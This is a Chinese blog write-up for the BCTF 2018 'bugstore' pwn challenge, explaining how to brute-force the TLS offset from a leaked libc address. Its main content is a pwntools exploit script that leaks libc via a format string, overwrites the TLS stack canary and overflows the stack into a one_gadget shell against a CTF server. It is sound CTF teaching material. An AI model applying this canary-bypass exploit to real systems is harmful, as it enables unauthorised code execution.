已知libc地址爆破TLS、ld.so等地址

最新推荐文章于 2024-05-07 17:51:23 发布
最新推荐文章于 2024-05-07 17:51:23 发布
阅读量1k 收藏 2
点赞数
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/107072062
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

已知libc地址爆破TLS、ld.so等地址

在大多数情况下,远程的ld.so以及TLS等结构的地址与libc地址之间的偏移与本地的会不一样,但是大致处于一个范围内,并且,在同一个系统里,这个差值是固定的,其差值的变化往往在偏移的第1.5BYTE~2.5BYTE的位置,即地址十六进制的第4、5个数,因此我们只需爆破2个十六进制数即可。

以列题来说明

BCTF_2018_bugstore

在函数中有栈溢出,但是有canary保护

我们来看看输入函数,输入函数遇到\0就结束了输入,而我们知道canary的最后一个字节一定是0,因此,我们输入了canary,后面的内容就输入不了了,因此,需要利用程序提供的任意地址写漏洞将TLS结构里canary覆盖为全部字节非零的值。

我们已知libc地址,TLS地址与libc地址字节的偏移在同一个系统里是固定的,但是不同系统、机器里,偏移就有微小变化,但是变化不大,一般在地址十六进制的第4、5个数,因此,我们可以爆破。

#coding:utf8
from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')

#爆破TLS的地址
for x in range(0xF):
   for y in range(0xF):
      try:
         #sh = process('./BCTF_2018_bugstore')
         sh = remote('node3.buuoj.cn',26763)
         sh.sendlineafter('Your choice:','F')
         sh.sendline('%p-%p-%p-%p-%p-%p-%p-%p-%p-LIBC:%p-')
         sh.recvuntil('LIBC:')
         libc_base = int(sh.recvuntil('-',drop = True),16) - 0xE7 - libc.sym['__libc_start_main']
         one_gadget_addr =  libc_base + 0x4f322
         print 'libc_base=',hex(libc_base)
         print 'one_gadget_addr=',hex(one_gadget_addr)

         offset = 0x6 << 20
         offset += x << 16
         offset += y << 12
         offset += 0x528
         #覆盖TLS里面的canary
         sh.sendlineafter('Your choice:','A')
         tls_canary_addr = libc_base + offset
         sh.sendline(str(tls_canary_addr))
         print 'tls_canary_addr=',hex(tls_canary_addr)

         sh.sendlineafter('Your choice:','S')
         payload = 'a'*0x28 + 'BUGSTORE' + 'a'*0x8 + p64(one_gadget_addr)
         sh.sendline(payload)
         sh.interactive()
      except:
         print 'trying...'
         sh.close()

 

ha1vk
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
libc.so.6 libc.so.6
05-31
libc.so.6
BCTF_Writeups
03-14
百度杯BCTF线上赛前8名队伍的Writeup,大家可以学习一下,推荐看217写的。
BCTF2018 baby_arena wp
yongbaoii的博客
01-19 209
保护开的并不多。 create puts阶段似乎是可以直接把libc泄露出来 size大小 能创建十个chunk delete 正常释放。 没有清空chunk中的内容,所以我们可以通过create函数直接泄露libc。 还有个login函数 函数在输入名字的时候存在溢出,可以做到一个任意地址写一个比较大的数字。 那么我们的利用方法就是把该泄露的泄露之后,我们攻击global_max_fast,申请很大的chunk,释放挂在_IO_list_all上面,做一个FSOP。 要注意虽然好像原题目给的是2..
linux ld so 源码分析,ld.so分析之7 _dl_sysdep_start
weixin_28711397的博客
05-12 582
ld.so分析之7 _dl_sysdep_start(sysdeps/generic/dl-sysdep.c)1.获取内核传递过来的信息Elf32_Addr//ElfW(Addr)_dl_sysdep_start (void **start_argptr,void (*dl_main) (const ElfW(Phdr) *phdr, ElfW(Word) phnum,ElfW(Addr) *us...
电商营销方式抢购,秒杀Redis原子出队列lpop方法作为剩余库存判断条件的实现方式(2)
热门推荐
zhengzizhi的专栏
09-09 1万+
秒杀要干的事:正确的减去库存数量,每个库存量正确的对应生成一个订单,买单支付跟秒杀没有关系,秒杀系统是独立的页面,独立的子系统。 1)使用Redis队列保存客户抢购成功的订单编号,使用Redis哈希类型保存订单详细信息,忠告:秒杀高并发设计不能与数据库业务混合在一起编程,这样并发能力很差,数据库的写入压力也非常大 2)使用原子方法 lpop 防止sku编码的商品超卖,本方案中当使用出队列lp...
劫持rtld_global中的函数指针&&hctf2018_the_end
azraelxuemo的博客
04-11 1000
文章目录前言劫持rtld_global中的函数指针exit_function_list__run_exit_handlers调用_dl_fini_rtld_global结构攻击 前言 在libc-2.23之后,加入了对IO vtable的check机制,所以有本用IO打的hctf2018_the_end转而使用另一种方法,也就是要介绍的劫持rtld_global中的函数指针 劫持rtld_global中的函数指针 ld相关函数在使用rtld_global时都需要先上锁, 以避免多进程下的条件竞争问题 相关函
.bashrc DIY
songpeng26的博客
08-22 171
# env status echo “sourcing ~/.bashrc…” # enter desktop when open terminal echo “enter desktop…” if [[ $PWD == $(realpath ~) ]]; then cd ~/Desktop/ fi
栈溢出实例--笔记三(ret2libc
一只青木呀
08-07 1293
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
BugKu-CTF(杂项misc)--easypicture/TLS
Nailaoyyds的博客
05-13 1086
目录 题解: 工具爆破压缩包密码 ​编辑 拿到密码0707 zsteg拿到密文 拿到flag 题解: 拿到一张图片 fostmore分解(普通图片不会有这么大kb的) 得到一张图片和一个压缩包 工具爆破压缩包密码 拿到密码0707 hint:你喝过咖啡吗?你见过彩色的图片吗?,这里其实提示的是stegsolve, 但是我用的是zsteg剖析ciphertext 拿到一串密文 zsteg拿到密文 AES解密:rcPr04H36Qj+......
Glibc线程局部存储(TLS)的实现
yeholmes的专栏
05-17 1911
背景 在笔者分析glibc源码中的内存分配模块时,遇到了线程局部变量thread_arena,该变量是线程专有的局部变量。在glibc源码中,有相似的变量errno,也是线程专有的变量。尽管在glibc的其他头文件中,errno被定义为 (* __errno_location()),但线程专有的变量实现机制是相同的,笔者希望了解其实现的具体机制。 调试代码 为了调试分析glibc对线程本地存储(Thread-Local-Storage,即TLS)实现的机制,笔者编写了如下代码(文件名为tls-test
libc++_shared.rar
07-13
博客资源文件,32位,存在于android\android-ndk-r12b\sources\cxx-stl\llvm-libc++\libs,博客https://blog.csdn.net/u013370255/article/details/107252777
android arm平台64位libc.so
06-18
解决undefined reference to `__system_property_get'问题,这是android arm平台64位libc.so,来源路径:/system/lib64/libc.so,具体看文章:http://blog.csdn.net/luoyong123456/article/details/50587417
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
CTF泄漏libc基址的方法
liucc09的博客
01-05 3801
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
linux 获取so基址,ld.so分析5 _dl_start
weixin_30325819的博客
05-15 419
ld.so分析5 _dl_start对于不关心的地方,我们都//或/**/注释掉1._dl_start中的变量声明static Elf32_Addr //我们假设是i386 32位平台,ElfW(Addr)被宏扩展为Elf32_Addr//ElfW(Addr)//__attribute_used__ internal_function//__attribute__ ((__used__)) __a...
随想录(libc.so和ld.so调试)
嵌入式-老费,一个分享专业嵌入式知识的blog
04-10 2237
【 声明:版权所有,欢迎转载,请勿用于商业用途。 联系信箱:feixiaoxing @163.com】 有时候看glibc一头雾水,那么多macro,也不知道哪些代码讲了什么,也不知道哪些编译了,哪些没有编译,所以总想找个机会看看glibc里面做了什么。可是调试glibc稍微有点麻烦,下面时我个人的一些经验,供大家参考。1、hello_world依赖哪些文件通常hello_world要想运行...
如何从libc地址得到栈地址
chennbnbnb的博客
01-19 2218
libc中保存了一个函数叫_environ,存的是当前进程的环境变量 得到libc地址后,libc基址+_environ的偏移量=_environ的地址 在内存布局中,他们同属于一个段,开启ASLR之后相对位置不变,偏移量之和libc库有关 通过_environ的地址得到_environ的值,从而得到环境变量地址,环境变量保存在栈中,所以通过栈内的偏移量,可以访问栈中任意变量 ...
ERROR: ld.so: object '/lib64/fileprotect.so' from /etc/ld.so.preload cannot be preloaded: ignored.问题
桃木鱼
04-24 4460
ERROR: ld.so: object '/lib64/fileprotect.so' from /etc/ld.so.preload cannot be preloaded: ignored.
淤地坝安全监测预警系统解决方案
最新发布
weixin_48039531的博客
05-07 867
淤地坝智能监测预警管理系统利用历史数据与实时监测信息、模型计算、数据分析等技术手段,能够第一时间反馈淤地坝的运行管理动态,加之与交换共享的气象信息、实时水文预报信息等的整合分析,以降雨预报作为业务的出发点,实现中型淤地坝的预报预警及重要淤地坝的预演预案,提高淤地坝安全度汛能力,满足国家、部位要求的淤地坝“四预”度汛能力,需要对不同地区的径流系数进行逐一核准,在预演预案模块仅针对重点淤地坝,覆盖面较窄,应用探索深度不够,淤地坝四预系统仍需进一步深化完善,以便提供更科学、更高效的信息化手段。
anroid 平台是否有libm.so libc++_shared.so libdl.so等
06-09
Android 平台提供了许多标准的 C/C++ 库,包括 libm.so、libc++_shared.so、libdl.so 等。这些库通常被放置在 Android 系统的 /system/lib 目录下,供应用程序使用。 具体来说,Android 平台提供了以下标准 C/C++ 库: - libc.so:标准 C 库,包含一些基本的函数,例如 malloc()、free()、printf() 等。 - libm.so:数学库,包含一些数学相关的函数,例如 sin()、cos()、sqrt() 等。 - libdl.so:动态链接库,包含一些动态加载和链接库的函数,例如 dlopen()、dlsym() 等。 - libc++_shared.so:C++ 库,包含一些 C++ 标准库的函数,例如 std::string、std::vector 等。 除了这些标准库之外,Android 平台还提供了许多其他的库,例如网络库、图形库、音频库等,这些库通常被放置在 /system/lib 或 /system/vendor/lib 目录下。开发者可以通过 ndk-build 或 CMake 等工具链来链接这些库,并在应用程序中使用它们提供的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值